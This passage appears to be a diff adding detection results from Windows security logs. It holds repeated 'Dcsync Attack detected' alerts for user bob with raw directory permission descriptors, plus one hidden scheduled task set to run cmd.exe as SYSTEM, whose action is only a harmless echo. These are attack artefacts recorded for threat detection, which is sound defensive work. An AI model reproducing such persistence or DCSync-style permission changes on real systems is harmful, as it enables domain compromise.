WPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)
+ %%14674
+
+",DC1.insecurebank.local,Security
+Dcsync Attack detected,1553549325.025627,2019-03-26T01:28:45.025627+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"
+
+
+
+
+ 5136
+ 0
+ 0
+ 14081
+ 0
+ 0x8020000000000000
+
+
+ 198242600
+
+
+
+
+ Security
+ DC1.insecurebank.local
+
+
+
+
+ 8E6BE6CD-81E7-4C8C-8EB0-50CA85B4950C
+ -
+ S-1-5-21-738609754-2819869699-4189121830-1108
+ bob
+ insecurebank
+ 0x40f2719
+ insecurebank.local
+ %%14676
+ DC=insecurebank,DC=local
+ C6FAF700-BFE4-452A-A766-424F84C29583
+ domainDNS
+ nTSecurityDescriptor
+ 2.5.5.15
+ O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)
+ %%14675
+
+",DC1.insecurebank.local,Security
+Dcsync Attack detected,1553549325.025627,2019-03-26T01:28:45.025627+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"
+
+
+
+
+ 5136
+ 0
+ 0
+ 14081
+ 0
+ 0x8020000000000000
+
+
+ 198242599
+
+
+
+
+ Security
+ DC1.insecurebank.local
+
+
+
+
+ 77B63738-C25C-4FBD-BA96-A7ABE17A22A3
+ -
+ S-1-5-21-738609754-2819869699-4189121830-1108
+ bob
+ insecurebank
+ 0x40f2719
+ insecurebank.local
+ %%14676
+ DC=insecurebank,DC=local
+ C6FAF700-BFE4-452A-A766-424F84C29583
+ domainDNS
+ nTSecurityDescriptor
+ 2.5.5.15
+ O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)
+ %%14674
+
+",DC1.insecurebank.local,Security
+Dcsync Attack detected,1553549325.025627,2019-03-26T01:28:45.025627+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"
+
+
+
+
+ 5136
+ 0
+ 0
+ 14081
+ 0
+ 0x8020000000000000
+
+
+ 198242598
+
+
+
+
+ Security
+ DC1.insecurebank.local
+
+
+
+
+ 77B63738-C25C-4FBD-BA96-A7ABE17A22A3
+ -
+ S-1-5-21-738609754-2819869699-4189121830-1108
+ bob
+ insecurebank
+ 0x40f2719
+ insecurebank.local
+ %%14676
+ DC=insecurebank,DC=local
+ C6FAF700-BFE4-452A-A766-424F84C29583
+ domainDNS
+ nTSecurityDescriptor
+ 2.5.5.15
+ O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)
+ %%14675
+
+",DC1.insecurebank.local,Security
+schedule task updated,1599047269.966623,2020-09-02T15:47:49.966623+04:00,,Audit,Low,schedule task updated by user,4702,"
+
+
+
+
+ 4702
+ 0
+ 0
+ 12804
+ 0
+ 0x8020000000000000
+
+
+ 2171293
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-5-21-308926384-506822093-3341789130-1106
+ a-jbrown
+ 3B
+ 0x21a8c68
+ \LMST
+ <?xml version="1.0" encoding="UTF-16"?>
+<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
+ <RegistrationInfo>
+ <Date>2020-09-02T04:47:49.74-07:00</Date>
+ <Author>a-jbrown</Author>
+ <Description>00304d6e</Description>
+ <URI>\LMST</URI>
+ </RegistrationInfo>
+ <Triggers>
+ <TimeTrigger>
+ <StartBoundary>2020-02-09T04:47:48</StartBoundary>
+ <EndBoundary>2020-02-09T04:47:58</EndBoundary>
+ <Enabled>true</Enabled>
+ </TimeTrigger>
+ </Triggers>
+ <Principals>
+ <Principal id="Author">
+ <RunLevel>HighestAvailable</RunLevel>
+ <UserId>SYSTEM</UserId>
+ </Principal>
+ </Principals>
+ <Settings>
+ <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
+ <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>
+ <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
+ <AllowHardTerminate>true</AllowHardTerminate>
+ <StartWhenAvailable>true</StartWhenAvailable>
+ <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
+ <IdleSettings>
+ <Duration>PT10M</Duration>
+ <WaitTimeout>PT1H</WaitTimeout>
+ <StopOnIdleEnd>true</StopOnIdleEnd>
+ <RestartOnIdle>false</RestartOnIdle>
+ </IdleSettings>
+ <AllowStartOnDemand>true</AllowStartOnDemand>
+ <Enabled>true</Enabled>
+ <Hidden>true</Hidden>
+ <RunOnlyIfIdle>false</RunOnlyIfIdle>
+ <WakeToRun>false</WakeToRun>
+ <ExecutionTimeLimit>PT72H</ExecutionTimeLimit>
+ <Priority>7</Priority>
+ </Settings>
+ <Actions Context="Author">
+ <Exec>
+ <Command>cmd.exe</Command>
+ <Arguments>/c echo testing > c:\users\public\out.txt</Arguments>
+ </Exec>
+ </Actions>
+</Task>
+
+",01566s-win16-ir.threebeesco.com,Security
+Dcsync Attack detected,1553549325.025627,2019-03-26T01:28:45.025627+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"
+
+
+
+
+ 5136
+ 0
+ 0
+ 14081
+ 0
+ 0x8020000000000000
+
+
+ 198242597
+
+
+
+
+ Security
+ DC1.insecurebank.local
+
+
+
+
+ 30F197FC-BECA-48D6-923E-A52A437119D3
+ -
+ S-1-5-21-738609754-2819869699-4189121830-1108
+ bob
+ insecurebank
+ 0x40f2719
+ insecurebank.local
+ %%14676
+ DC=insecurebank,DC=local
+ C6FAF700-BFE4-452A-A766-424F84C29583
+ domainDNS
+ nTSecurityDescriptor
+ 2.5.5.15
+ O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)
+ %%14674
+
+",DC1.insecurebank.local,Security
+Dcsync Attack detected,1553549325.025627,2019-03-26T01:28:45.025627+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"
+
+
+
+
+ 5136
+ 0
+ 0
+ 14081
+ 0
+ 0x8020000000000000
+
+
+ 198242596
+
+
+
+
+ Security
+ DC1.insecurebank.local
+
+
+
+
+ 30F197FC-BECA-48D6-923E-A52A437119D3
+ -
+ S-1-5-21-738609754-2819869699-4189121830-1108
+ bob
+ insecurebank
+ 0x40f2719
+ insecurebank.local
+ %%14676
+ DC=insecurebank,DC=local
+ C6FAF700-BFE4-452A-A766-424F84C29583
+ domainDNS
+ nTSecurityDescriptor
+ 2.5.5.15
